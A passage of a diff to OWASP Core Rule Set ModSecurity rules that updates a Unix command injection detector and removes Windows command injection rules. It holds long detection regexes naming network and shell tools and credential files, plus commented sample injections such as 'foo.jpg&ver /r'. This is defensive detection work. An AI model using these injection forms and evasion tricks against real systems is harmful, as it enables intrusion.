&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\v&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\v&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\v&\)<>\|]|grep|i(?:le(?:[\s\v&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\v&\)<>\|])|o(?:ld[\s\v&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\v&\)<>\|]|core|e(?:ni(?:e[\s\v&\)<>\|]|soimage)|tfacl[\s\v&\)<>\|])|hci|i(?:mp[\s\v&\)<>\|]|nsh)|r(?:ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|dconfig|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ke[\s\v&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\v&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\v&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\v&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\v&\)<>\|]|map|o(?:de[\s\v&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:
-cgi|[57])|i(?:(?:co|ng)[\s\v&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\v&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\v&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\v]|3?versions))|r(?:ak(?:e[\s\v&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\v&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\v&\)<>\|]|user)|nano|oute[\s\v&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|nap)[\s\v&\)<>\|]|c(?:hed|r(?:een|ipt)[\s\v&\)<>\|])|diff|e(?:(?:lf|rvice)[\s\v&\)<>\|]|ndmail|t(?:arch|env|facl[\s\v&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\v&\)<>\|]|u(?:f|tdown[\s\v&\)<>\|]))|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\v&\)<>\|])|mux|ouch[\s\v&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\v&\)<>\|]|gr|mdiff|pw|rsh)|olatility[\s\v&\)<>\|])|w(?:a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ + "id:932235,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Remote Command Execution: Unix Command Injection',\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-shell',\
@@ -151,182 +194,77 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-# [ Windows command injection ]
-#
-# This rule detects Windows shell command injections.
-# If you are not running Windows, it is safe to disable this rule.
-#
-# A command injection takes a form such as:
-#
-# foo.jpg&ver /r
-# foo.jpg|ver /r
-#
-# The vulnerability exists when an application executes a shell command
-# without proper input escaping/validation.
-#
-# To prevent false positives, we look for a 'starting sequence' that
-# precedes a command in CMD syntax, such as: ; | & `
-#
-# Anatomy of the regexp:
-#
-# 1. Starting tokens
-#
-# ; ;cmd
-# \{ {cmd
-# \| |cmd
-# \|\| ||cmd
-# & &cmd
-# && &&cmd
-# \n \ncmd
-# \r \rcmd
-# ` `cmd
-#
-# 2. Command prefixes
-#
-# ( (cmd)
-# , ,cmd
-# @ @cmd
-# ' 'cmd'
-# " "cmd"
-# \s spacing+cmd
-#
-# 3. Paths
-#
-# [\w'\"\./]+/ /path/cmd
-# [\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\ C:\Program Files\cmd
-# [\^\.\w '\"/\\\\]*\\\\)?[\"\^]* \\net\share\dir\cmd
-#
-# 4. Quoting
-#
-# \" "cmd"
-# \^ ^cmd
-#
-# 5. Extension/switches
-#
-# \.[\"\^]*\w+ cmd.com, cmd.exe, etc.
-# /b cmd/h
-#
-# An effort is made to combat evasions by CMD syntax; for example,
-# the following strings are valid: c^md, @cmd, "c"md. ModSecurity
-# has a t:cmdLine transformation built-in to deal with some of these,
-# but unfortunately, that transformation replaces ';' characters (so
-# we cannot match on the start of a command) and '\' characters (so we
-# have trouble matching paths). This makes the regexp more complex.
-#
-# This rule is case-insensitive.
-# -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl -# -# Then insert the assembled regexp into this template: -# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* -# [regexp assembled from util/regexp-assemble/regexp-932110.txt] -# (?:\.[\"\^]*\w+)?\b" \ -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:m[\"\^]*(?:y[\"\^]*s[\"\^]*q[\"\^]*l(?:[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p(?:[\"\^]*s[\"\^]*l[\"\^]*o[\"\^]*w)?|h[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*h[\"\^]*o[\"\^]*w))?|s[\"\^]*(?:i[\"\^]*(?:n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2|e[\"\^]*x[\"\^]*e[\"\^]*c)|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|g[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*c)|o[\"\^]*(?:u[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|v[\"\^]*o[\"\^]*l)|v[\"\^]*e[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r|[dr][\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*i[\"\^]*n[\"\^]*k)|d[\"\^]*(?:s[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*d|(?:[\s,;]|\.|/|<|>).*)|a[\"\^]*p[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*d|b[\"\^]*s[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*i|e[\"\^]*a[\"\^]*s[\"\^]*u[\"\^]*r[\"\^]*e|m[\"\^]*s[\"\^]*y[\"\^]*s)|d[\"\^]*(?:i[\"\^]*(?:s[\"\^]*k[\"\^]*(?:(?:m[\"\^]*g[\"\^]*m|p[\"\^]*a[\"\^]*r)[\"\^]*t|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|r[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*e)|f[\"\^]*f[\"\^]*(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*(?:l[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*f|t[\"\^]*r[\"\^]*e[\"\^]*e|(?:[\s,;]|\.|/|<|>).*)|v[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c
[\"\^]*o[\"\^]*n)|(?:f[\"\^]*r[\"\^]*a|b[\"\^]*u)[\"\^]*g)|s[\"\^]*(?:a[\"\^]*(?:c[\"\^]*l[\"\^]*s|d[\"\^]*d)|q[\"\^]*u[\"\^]*e[\"\^]*r[\"\^]*y|m[\"\^]*o[\"\^]*(?:v[\"\^]*e|d)|g[\"\^]*e[\"\^]*t|r[\"\^]*m)|(?:r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r|o[\"\^]*s[\"\^]*k[\"\^]*e)[\"\^]*y|(?:c[\"\^]*o[\"\^]*m[\"\^]*c[\"\^]*n[\"\^]*f|x[\"\^]*d[\"\^]*i[\"\^]*a)[\"\^]*g|a[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|n[\"\^]*s[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|c[\"\^]*(?:o[\"\^]*(?:m[\"\^]*(?:p[\"\^]*(?:(?:a[\"\^]*c[\"\^]*t[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|m[\"\^]*g[\"\^]*m[\"\^]*t)|e[\"\^]*x[\"\^]*p)|n[\"\^]*(?:2[\"\^]*p|v[\"\^]*e)[\"\^]*r[\"\^]*t|p[\"\^]*y)|l[\"\^]*(?:e[\"\^]*a[\"\^]*(?:n[\"\^]*m[\"\^]*g[\"\^]*r|r[\"\^]*m[\"\^]*e[\"\^]*m)|u[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*r)|h[\"\^]*(?:k[\"\^]*(?:n[\"\^]*t[\"\^]*f[\"\^]*s|d[\"\^]*s[\"\^]*k)|d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|s[\"\^]*(?:c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|c[\"\^]*m[\"\^]*d)|v[\"\^]*d[\"\^]*e)|e[\"\^]*r[\"\^]*t[\"\^]*(?:u[\"\^]*t[\"\^]*i[\"\^]*l|r[\"\^]*e[\"\^]*q)|a[\"\^]*(?:l[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|c[\"\^]*l[\"\^]*s)|m[\"\^]*d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|i[\"\^]*p[\"\^]*h[\"\^]*e[\"\^]*r|u[\"\^]*r[\"\^]*l)|f[\"\^]*(?:o[\"\^]*r[\"\^]*(?:m[\"\^]*a[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*n[\"\^]*d[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|s[\"\^]*t[\"\^]*r)|s[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*(?:p[\"\^]*(?:[\s,;]|\.|/|<|>).*|y[\"\^]*p[\"\^]*e)|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|c[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*r[\"\^]*e[\"\^]*p)|n[\"\^]*(?:e[\"\^]*t[\"\^]*(?:s[\"\^]*(?:t[\"\^]*a[\"\^]*t|v[\"\^]*c|h)|(?:[\s,;]|\.|/|<|>).*|c[\"\^]*a[\"\^]*t|d[\"\^]*o[\"\^]*m)|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|r[\"\^]*i[\"\^]*g[\"\^]*h[\"\^]*t[\"\^]*s)|(?:s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u|m[\"\^]*a)[\"\^]*p|c[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|a[\"\^]*t)|b
[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|e[\"\^]*(?:x[\"\^]*p[\"\^]*(?:a[\"\^]*n[\"\^]*d[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*(?:c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e|v[\"\^]*w[\"\^]*r)|n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|g[\"\^]*r[\"\^]*e[\"\^]*p|r[\"\^]*a[\"\^]*s[\"\^]*e|c[\"\^]*h[\"\^]*o)|g[\"\^]*(?:a[\"\^]*t[\"\^]*h[\"\^]*e[\"\^]*r[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*w[\"\^]*o[\"\^]*r[\"\^]*k[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*(?:(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l|e[\"\^]*d[\"\^]*i)[\"\^]*t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|i[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*t[\"\^]*m[\"\^]*a[\"\^]*c)|i[\"\^]*(?:r[\"\^]*b(?:[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))?|f[\"\^]*m[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*e[\"\^]*r|p[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|n[\"\^]*e[\"\^]*t[\"\^]*c[\"\^]*p[\"\^]*l|c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s)|a[\"\^]*(?:d[\"\^]*(?:d[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*s|m[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*m[\"\^]*d)|r[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*t[\"\^]*r[\"\^]*i[\"\^]*b|s[\"\^]*s[\"\^]*o[\"\^]*c|z[\"\^]*m[\"\^]*a[\"\^]*n)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*i[\"\^]*m[\"\^]*e|m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f)|a[\"\^]*b[\"\^]*e[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*r[\"\^]*m[\"\^]*g[\"\^]*r)|b[\"\^]*(?:(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)|r[\"\^]*o[\"\^]*w[\"\^]*s[\"\^]*t[\"\^]*a)[\"\^]*t|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|o[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*f[\"\^]*g)|h[\"\^]*(?:o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e|d[\"\^]*w[\"\^]*w[\"\^]*i[\"\^]*z)|j[\"\^]*a[\"\^]*v[\"\^]*a[\"\^]*(?:[\s,;]|\.|/|<|>).*|7[\"\^]*z(?:[\"\^]*[ar])?)(?:\.[\"\^]*\w+)?\b" \ - "id:932110,\ - phase:2,\ - block,\ - capture,\ - t:none,\ - msg:'Remote Command Execution: Windows Command Injection',\ - logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
- tag:'application-multi',\
- tag:'language-shell',\
- tag:'platform-windows',\
- tag:'attack-rce',\
- tag:'paranoia-level/1',\
- tag:'OWASP_CRS',\
- tag:'capec/1000/152/248/88',\
- tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
- severity:'CRITICAL',\
- setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-# Apache 2.2 requires configuration file lines to be under 8kB.
-# Therefore, some remaining commands have been split off to a separate rule.
-# For explanation of this rule, see rule 932110.
-#
-# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
-# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
+# [ Windows PowerShell, cmdlets and options ]
 #
-# To rebuild the word list regexp:
-# cd util/regexp-assemble
-# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl
+# Detect some common PowerShell commands, cmdlets and options.
+# These commands should be relatively uncommon in normal text, but
+# potentially useful for code injection.
 #
-# Then insert the assembled regexp into this template:
+# If you are not running Windows, it is safe to disable this rule.
# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* -# [regexp assembled from util/regexp-assemble/regexp-932110.txt] -# (?:\.[\"\^]*\w+)?\b" \ +# https://learn.microsoft.com/en-us/previous-versions/technet-magazine/ff714569(v=msdn.10) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[
\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^]*q[\"\^]*r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*
